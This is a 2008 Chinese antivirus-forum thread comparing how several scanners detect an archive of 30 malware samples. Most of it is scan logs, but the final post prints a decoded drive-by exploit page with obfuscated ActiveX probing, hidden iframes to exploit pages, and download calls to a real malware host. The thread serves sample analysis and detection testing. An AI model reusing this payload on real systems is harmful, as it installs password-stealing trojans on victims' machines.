查看: 6468|回复: 34
收起左侧

[病毒样本] 30个病毒样本,可能来自深度

[复制链接]
神一样的害虫
头像被屏蔽
发表于 2008-6-2 23:58:21 | 显示全部楼层 |阅读模式
我在长枫看到的样本,楼主说有三十个毒。我用avg8av查出31个,大蜘蛛4.44(绿色)11个,小红伞正在升级,等等查试试

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
frodo
发表于 2008-6-3 00:04:57 | 显示全部楼层
Avira kill them all
frodo
发表于 2008-6-3 00:12:38 | 显示全部楼层
kaspersky missed 3
神一样的害虫
头像被屏蔽
 楼主| 发表于 2008-6-3 00:13:05 | 显示全部楼层
小红伞8.0是30个,7.0是27个,两个都是绿色版的,刚刚更新
欠妳緈諨
发表于 2008-6-3 00:31:35 | 显示全部楼层
Ikarus全灭
:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\VMwareService.exe - 特征码 'Trojan-PWS.Win32.Agent.jp' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\tmp7A.tmp - 特征码 'Trojan-PWS.Win32.OnLineGames.kmp' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\pcibus.sys - 特征码 'Worm.Win32.Downloader.cb' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\8838283[1].htm - 特征码 'Trojan.IFrame.AW' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\XunLei[1].htm - 特征码 'VirTool.JS.Obfuscator.B' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\noani[2].htm - 特征码 'Trojan-Downloader.JS.Agent.aln' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\Ms06014[1].htm - 特征码 'VirTool.JS.Obfuscator.B' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\haha[1].htm - 特征码 'Trojan.JS.PVH' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\jh[1].htm - 特征码 'Exploit.JS.RealPlr.h' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\kong[1].htm - 特征码 'Trojan-Downloader.HTML.IFrame.bn' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\htm[1].htm - 特征码 'Trojan-Clicker.HTML.IFrame.gd' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\gm[1].htm - 特征码 'Trojan-Downloader.JS.Agent.ala' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\6671697[1].htm - 特征码 'Trojan.IFrame.AW' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\Ajax[1].htm - 特征码 'VirTool.JS.Obfuscator.B' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\ani[1].htm - 特征码 'Trojan-Downloader.JS.Agent.aln' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\11[1].js - 特征码 'Trojan-Downloader.JS.Agent.alm' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\rl[2].js - 特征码 'Exploit.Win32.RealPlr.l' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\realplayer[1].htm - 特征码 'Exploit.JS.RealPlr.u' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\kaka[1].htm - 特征码 'Trojan-Clicker.HTML.IFrame.gc' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\down1[1].txt - 特征码 'Trojan-Clicker.HTML.IFrame.gc' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\2[1].htm - 特征码 'Trojan-Downloader.JS.Agent.akd' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\1[1].js - 特征码 'Exploit.JS.RealPlr.bk' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\realplay_071122_exp[1].htm - 特征码 'Exploit.JS.RealPlr.u' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\realplayer[2].htm - 特征码 'Trojan-Downloader.JS.Agent.aln' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\lz[1].htm - 特征码 'Trojan-Downloader.JS.Agent.alo' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\gege[1].htm - 特征码 'Trojan-Downloader.JS.Psyme.wj' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\ani[1].c - 特征码 'Exploit.Win32.IMG-ANI.i' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\tmp7C.tmp - 特征码 'Trojan-PWS.Win32.OnLineGames.joj' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\tmp77.tmp - 特征码 'Trojan-PWS.Win32.OnLineGames.jer' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar:\tmp83.tmp - 特征码 'Trojan-PWS.Win32.OnLineGames.kpe' 被发现
D:\病毒测试\临时解压\36_7279_43d59c61151a015.rar

        31 文件被扫描
          (1 压缩档 30 文件)
        30 特征码被侦测
        0 可疑代码段被发现
        耗时: 0:01.573
神一样的害虫
头像被屏蔽
 楼主| 发表于 2008-6-3 00:33:49 | 显示全部楼层
Ikarus是什么?我第一次听说啊。。。。。。
chabosh
发表于 2008-6-3 00:42:37 | 显示全部楼层
正在扫描日志
病毒库版本: 3152 (20080602)
日期: 08-06-03  时间: 0:44:52
已扫描的磁盘、文件夹和文件: D:\Downloads\NewFiles\30个病毒样本.rar
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > VMwareService.exe - Win32/Mypis.H 病毒 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > tmp7A.tmp - Win32/PSW.OnLineGames.NJY 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > pcibus.sys - Win32/Jalous.Z 蠕虫 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > 8838283[1].htm - HTML/TrojanDownloader.IFrame 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > XunLei[1].htm - HTML/TrojanClicker.IFrame.GC 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > noani[2].htm - JS/TrojanDownloader.Agent.ALN 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > Ms06014[1].htm - HTML/TrojanClicker.IFrame.GC 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > haha[1].htm - JS/TrojanDownloader.Agent.ALJ 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > jh[1].htm - JS/Exploit.RealPlay.H 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > kong[1].htm - HTML/TrojanDownloader.IFrame 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > htm[1].htm - JS/TrojanDownloader.Agent.ALW 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > gm[1].htm - JS/TrojanDownloader.Agent.ALA 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > 6671697[1].htm - HTML/TrojanDownloader.IFrame 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > Ajax[1].htm - JS/TrojanDownloader.Psyme.NCR 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > ani[1].htm - JS/TrojanDownloader.Agent.ALN 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > 11[1].js - JS/TrojanDownloader.Agent.ALM 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > rl[2].js - JS/Exploit.RealPlay.L 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > realplayer[1].htm - HTML/TrojanClicker.IFrame.GC 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > kaka[1].htm - HTML/TrojanClicker.IFrame.GC 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > 2[1].htm - JS/TrojanDownloader.Agent.AKD 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > 1[1].js - JS/TrojanDownloader.Agent.WK 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > realplay_071122_exp[1].htm - JS/Exploit.RealPlay.E 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > realplayer[2].htm - JS/Exploit.RealPlay.NAA 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > lz[1].htm - JS/TrojanDownloader.Agent.ALO 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > gege[1].htm - JS/Exploit.RealPlay.NAB 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > ani[1].c - Win32/TrojanDownloader.Ani.Gen 特洛伊木马 的变种 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > tmp7C.tmp - Win32/PSW.OnLineGames.JOJ 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > tmp77.tmp - Win32/PSW.OnLineGames.JER 特洛伊木马 - 是已删除对象的一部分
D:\Downloads\NewFiles\30个病毒样本.rar > RAR > tmp83.tmp - Win32/PSW.OnLineGames.NKI 特洛伊木马 - 是已删除对象的一部分
已扫描的对象数: 30
发现的威胁数: 29
已清除对象数:29
完成时间: 0:44:53  总扫描时间: 1 秒 (00:00:01)
电影结束了
发表于 2008-6-3 08:34:52 | 显示全部楼层
扫描系统区域...
扫描所选择的目录和文件...
对象: VMwareService.exe
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Worm.Win32.Anilogo.b (KAV 引擎), Win32.Worm.Cekar.A (BD 引擎)
对象: tmp7A.tmp
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-PSW.Win32.OnLineGames.kmp (KAV 引擎), Trojan.PWS.YCG (BD 引擎)
对象: pcibus.sys
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Worm.Win32.Downloader.cb (KAV 引擎), Trojan.Agent.AFWL (BD 引擎)
对象: XunLei[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Clicker.HTML.IFrame.gc (KAV 引擎), Exploit.HTML.MIA (BD 引擎)
对象: noani[2].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.JS.Agent.aln (KAV 引擎), Trojan.IFrame.BM (BD 引擎)
对象: Ms06014[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Clicker.HTML.IFrame.gc (KAV 引擎), Exploit.HTML.MIA (BD 引擎)
对象: haha[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.JS.Agent.alj (KAV 引擎)
对象: jh[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Exploit.JS.RealPlr.h (KAV 引擎)
对象: kong[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.HTML.IFrame.bn (KAV 引擎), Trojan.Downloader.JS.Agent.F (BD 引擎)
对象: htm[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Clicker.HTML.IFrame.gd (KAV 引擎)
对象: gm[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.JS.Agent.ala (KAV 引擎), Exploit.Ascii.B (BD 引擎)
对象: Ajax[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Clicker.HTML.IFrame.gc (KAV 引擎), Exploit.HTML.MIA (BD 引擎)
对象: ani[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.JS.Agent.aln (KAV 引擎), Trojan.IFrame.BC (BD 引擎)
对象: 11[1].js
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.JS.Agent.alm (KAV 引擎), Trojan.Script.3032 (BD 引擎)
对象: rl[2].js
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Exploit.Win32.RealPlr.l (KAV 引擎)
对象: realplayer[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Clicker.HTML.IFrame.gc (KAV 引擎), Trojan.Downloader.JS.Agent.OF (BD 引擎)
对象: kaka[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Clicker.HTML.IFrame.gc (KAV 引擎), Exploit.HTML.MIA (BD 引擎)
对象: 2[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.JS.Agent.akd (KAV 引擎)
对象: 1[1].js
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Exploit.JS.RealPlr.bk (KAV 引擎)
对象: realplay_071122_exp[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Exploit.JS.RealPlr.af (KAV 引擎), Trojan.Downloader.JS.Agent.OF (BD 引擎)
对象: realplayer[2].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.JS.Agent.aln (KAV 引擎), Trojan.IFrame.BC (BD 引擎)
对象: lz[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.JS.Agent.alo (KAV 引擎), Trojan.Script.1283 (BD 引擎)
对象: gege[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.JS.Psyme.wj (KAV 引擎)
对象: tmp7C.tmp
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-PSW.Win32.OnLineGames.joj (KAV 引擎), Rootkit.OnLineGames.1 (BD 引擎)
对象: tmp77.tmp
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-PSW.Win32.OnLineGames.jer (KAV 引擎), Trojan.PWS.YBJ (BD 引擎)
对象: tmp83.tmp
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan-PSW.Win32.OnLineGames.kpe (KAV 引擎), Rootkit.OnLineGames.1 (BD 引擎)
对象: 8838283[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan.IFrame.AW (BD 引擎)
对象: haha[1].htm (JAVASCRIPT 2)
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan.JS.PVH (BD 引擎)
对象: haha[1].htm (JAVASCRIPT 3)
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan.JS.PVH (BD 引擎)
对象: 6671697[1].htm
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Trojan.IFrame.AW (BD 引擎)
对象: down1[1].txt
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Exploit.HTML.MIA (BD 引擎)
对象: ani[1].c
        在压缩档案里: F:\36_7279_43d59c61151a015.rar
        Status: 已发现病毒
        病毒: Exploit.Win32.MS05-002.Gen (BD 引擎)
woods12345
发表于 2008-6-3 08:59:34 | 显示全部楼层
文件一起有47个  30个是显示的  还有17个是隐藏的      我的红伞8.0杀了30个   大蜘蛛11个   驱逐舰就12个      无语、、、
tanlimo
发表于 2008-6-3 09:25:43 | 显示全部楼层
里面貌似有很多宝贝。

  1. http://www.xtcss.cn/mm/11.exe
  2. http://www.xtcss.cn/mm/12.exe
  3. http://www.xtcss.cn/mm/13.exe
  4. http://www.xtcss.cn/mm/14.exe
  5. http://www.xtcss.cn/mm/15.exe
  6. http://www.xtcss.cn/mm/16.exe
  7. http://www.xtcss.cn/mm/17.exe
  8. http://www.xtcss.cn/mm/18.exe
  9. http://www.xtcss.cn/mm/19.exe
  10. http://www.xtcss.cn/mm/20.exe
  11. http://www.xtcss.cn/mm/21.exe
  12. http://www.xtcss.cn/mm/22.exe
  13. http://www.xtcss.cn/mm/23.exe
  14. http://www.xtcss.cn/mm/24.exe
  15. http://www.xtcss.cn/mm/25.exe
  16. http://www.xtcss.cn/mm/26.exe
  17. <Html><iframe width='100' height='0' src='http://www.xtcss.cn/ah/realplayer.htm'></iframe>
  18. <Body>
  19. <noscript>
  20. <iframe src=*></iframe>
  21. </noscript>
  22. <script language="javaScript">
  23. function init(){
  24. document.write()
  25. }window.onload=init;
  26. if(document.cookie.indexOf('cuteqqs')==-1){
  27. try{
  28.   var e;
  29.   var cuteqqid="\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31";
  30.   var cuteqqids="\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36";
  31.   var cuteqqidx=cuteqqid+cuteqqids;
  32.   var ado=(document.createElement("object"));
  33.   ado.setAttribute("classid",cuteqqidx);
  34.   var as=ado.createobject("Adodb.Stream","")
  35. }catch(e){
  36.   
  37. };
  38. finally{
  39.   var expires=new Date();
  40.   expires.setTime(expires.getTime()+24*60*60*1000);
  41.   document.cookie='cuteqqs=qq784378237;path=/;expires='+expires.toGMTString();
  42.   if(e!="[object Error]"){
  43.    document.write("<iframe width='0' height='0' src='http://www.xtcss.cn/ah/Ajax.htm'></iframe>")
  44.    document.write("<iframe width='0' height='0' src='http://www.xtcss.cn/ah/Ms06014.htm'></iframe>")
  45.   }else {
  46.    try{
  47.     var l;
  48.     var zss=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1")
  49.    }
  50.    
  51.    catch(l){
  52.    
  53.    };
  54.    finally{
  55.     if(l!="[object Error]"){
  56.     document.write("<iframe width='0' height='0' src='http://www.xtcss.cn/ah/Ms06067.html'></iframe>")
  57.     }
  58.    }try{
  59.     var f;
  60.     var storm=new ActiveXObject("MPS.StormPlayer")
  61.    }catch(f){
  62.    
  63.    };
  64.    finally{
  65.     if(f!="[object Error]"){
  66.     document.write("<iframe width='0' height='0' src='http://www.xtcss.cn/ah/Bfyy.html'></iframe>")
  67.     }
  68.    }try{
  69.     var g;
  70.     var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
  71.    }catch(g){
  72.    
  73.    };
  74.    finally{
  75.     if(g!="[object Error]"){
  76.     document.write("<iframe width='0' height='0' src='http://www.xtcss.cn/ah/Pps.html'></iframe>")
  77.     }
  78.    }try{
  79.     var h;
  80.     var thunder=new ActiveXObject("DPClient.Vod")
  81.    }catch(h){
  82.    
  83.    };
  84.    finally{
  85.     if(h!="[object Error]"){
  86.     document.write("<iframe width='5' height='5' src='http://www.xtcss.cn/ah/XunLei.html'></iframe>")
  87.     }
  88.    }try{
  89.     var j;
  90.     var lianzhong=new ActiveXObject("GLCHAT.GLChatCtrl.1")
  91.    }catch(j){
  92.    
  93.    };
  94.    finally{
  95.     if(j!="[object Error]"){
  96.     document.write("<iframe width='0' height='0' src='http://www.xtcss.cn/ah/Lz.html'></iframe>")
  97.     }
  98.    }try{
  99.     var i;
  100.     var obj=new ActiveXObject("BaiduBar.Tool")
  101.    }catch(i)
  102.    
  103.    {
  104.    
  105.    };
  106.    finally{
  107.     if(i!="[object Error]"){
  108.     obj.DloadDS("http://www.xtcss.cn/ah/bd.cab","bd.exe",0)
  109.     }
  110.     if(l=="[object Error]"&&f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&j=="[object Error]"&&i=="[object Error]"){
  111.     document.write("<iframe width='0' height='0' src='http://www.xtcss.cn/ah/Ms07004.html'></iframe>")}
  112.    }
  113.   }
  114. }
  115. }
  116. </script>
  117. </Body>
  118. </Html>

复制代码

[ 本帖最后由 tanlimo 于 2008-6-3 09:27 编辑 ]
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-15 18:17 , Processed in 0.152460 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表